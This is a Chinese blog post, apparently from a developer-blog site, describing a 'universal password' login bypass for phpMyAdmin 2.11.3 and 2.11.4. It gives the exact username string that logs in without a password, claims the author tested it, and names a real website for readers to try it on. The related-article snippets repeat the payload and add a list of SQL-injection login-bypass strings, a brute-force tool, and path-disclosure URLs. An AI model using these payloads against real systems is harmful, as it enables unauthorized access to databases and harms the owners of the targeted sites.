PHPmyadmin 2.11.4万能密码

最新推荐文章于 2023-10-08 20:35:21 发布
最新推荐文章于 2023-10-08 20:35:21 发布 · 151 阅读 · 0

本文介绍了一个存在于 PHPMyAdmin 2.11.3 版本中的漏洞,该漏洞允许攻击者通过特定代码绕过认证。测试表明此漏洞有效,并提供了测试网站及利用代码。

‘localhost’@’@”


PHPmyadmin 2.11.3


两个版本都有此漏洞


我去测试了一下 确实可以用。。。


给你找到一个测试网址http://www.hitag.cn


你们可以试一下


只需要输入账号 密码不需要输入


利用代码如下:


‘localhost’@’@”

原文章http://www.0x6.us/?FoxNews=5.html
iteye_3606
关注
WEB应用其它常见漏洞总结
XLbb的博客
01-29 960
1.暴力猜解用户名及密码1.暴力猜解用户名及密码第一步肯定是要做这个工作的,不提供测试账号,当然要暴力猜解一下了。尝试一些弱口令如admin:admin, test:test, weblogic:weblogic, root:passwd等等,如以下在渗透测试过程中遇到的口令test:test。2.扫敏感目录及备份文件。
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 1万+
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
phpmyadmin万能密码
kuxing100的专栏
07-25 6703
phpmyadmin 2.11.3 phpmyadmin 2.11.4 利用方式: 直接在phpmyadmin的用户名内填入: ‘localhost’@'@” 不用填入密码,可以直接登录,管理权限哦。
[文件数据]phpMyAdmin 2.11.9.5 For Linux_phpmyadmin-2.11.9.5-codepub.
03-15
[文件数据]phpMyAdmin 2.11.9.5 For Linux_phpmyadmin-2.11.9.5-codepub.[文件数据]phpMyAdmin 2.11.9.5 For Linux_phpmyadmin-2.11.9.5-codepub. 1.适合个人搭建网站项目参考 2.适合学生毕业设计搭建网站参考 3....
[文件数据]phpMyAdmin 2.11.9.5 For Windows_phpmyadmin-2.11.9.5-as.zip
03-15
[文件数据]phpMyAdmin 2.11.9.5 For Windows_phpmyadmin-2.11.9.5-as.zip[文件数据]phpMyAdmin 2.11.9.5 For Windows_phpmyadmin-2.11.9.5-as.zip 1.适合个人搭建网站项目参考 2.适合学生毕业设计搭建网站参考 3....
phpMyAdmin 2.11.9.4.rar
05-12
**phpMyAdmin 2.11.9.4:MySQL数据库管理的重要工具** phpMyAdmin 是一个基于Web的开源应用程序,用于管理和维护MySQL或MariaDB数据库。版本2.11.9.4是该工具的一个特定发行版,它提供了一个用户友好的图形界面,...
phpMyAdmin 2.11.9.4/2.11.8.1版本中文乱码问题修正补丁
标题中的“phpmyadmin补丁2.11.9.4/2.11.8.1”指的是针对phpMyAdmin这个数据库管理工具的特定版本(2.11.9.42.11.8.1)开发的补丁程序。这个补丁解决的主要问题是中文乱码显示问题,由于phpMyAdmin在处理特定字符...
phpMyAdmin 2.11.8.1发布,支持MySQL数据库管理
因此,使用phpMyAdmin-2.11.8.1这样的旧版本时,必须采取额外防护措施:定期更新补丁(如果官方仍提供)、限制IP访问、启用HTTPS加密传输、使用强密码策略、关闭不必要的功能模块(如服务器级管理)、监控日志异常...
phpmyadmin 万能密码漏洞
weixin_30344131的博客
10-11 797
基本2.x.x 版本,空密码也能登录phpmyadmin ,'localhost'@'@'' 查了下,基于mysql 数据库权限的漏洞造成 默认会有一个user 为’’ 空的帐号 ''@localhost mysql -u'' -p 直接能进数据库,把这个帐号删除就ok了 ,drop user ''@localhost 或者升级高版本的phpmyadmin 。3.x 版本就没有的 ...
phpMyAdmin
梦想的天空
08-10 2419
<br />phpMyAdmin 是一个用PHP编写的,可以通过 web 方式控制和操作 MySQL 数据库。通过 phpMyAdmin 可以完全对数据库进行操作,例如建立、复制、删除数据等等。 <br />如果使用合适的工具,MySQL 数据库的管理就会为得相当简单。应用 MySQL 命令行方式需要对 MySQL 知识非常熟悉,对 SQL语言也是同样的道理。不仅如此,如果数据库的访问量很大,列表中数据的读取就会相当困难。<br />当前出现很多 GUI MySQL 客户程序,其中最为出色的是基于 Web
【转】phpmyadmin万能密码漏洞
weixin_30466953的博客
09-07 491
影响版本:2.11.3 / 2.11.4 利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号) 附上几个php爆绝对路径的办法: phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/ind...
PHPmyadmin 2.11.4万能密码漏洞
收集盒 Book box
05-20 2253
PHPmyadmin 2.11.4 PHPmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 给你找到一个测试网址http://www.hitag.cn 你们可以试一下 只需要输入账号  密码不需要输入 利用代码如下: ‘localhost’@'@”   http://www.cnyzy.cn/blogvi
万能密码大全
pierremay的博客
07-29 1万+
asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1
web应用常见的其他漏洞总结
2301_79194110的博客
10-08 669
通过扫描器扫描(绿盟,天镜,极光等),7kb扫文件扫目录拼接后面这个/.svn/entries扫描出这个直接在地址后面拼接https://www.xxx.com/.svn/entries 使用seay-svn软件连接,可以查看源代码。1.对用户的数据进行合法性校验,对特殊的字符进行编码,如<、>、’、”、CR、LF等,限制用户输入的 CR 和 LF,或者对 CR 和 LF 字符正确编码后再输出,以防止注入自定义 HTTP 头;右边的“相关软件”的链接,存在一个任意文件下载漏洞。
PHPmyadmin漏洞和拿shell
热门推荐
Hacker小梦
04-06 1万+
phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。 phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用 找这个的话 用自己的写的脚本,或者搜素引擎什么的,这
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值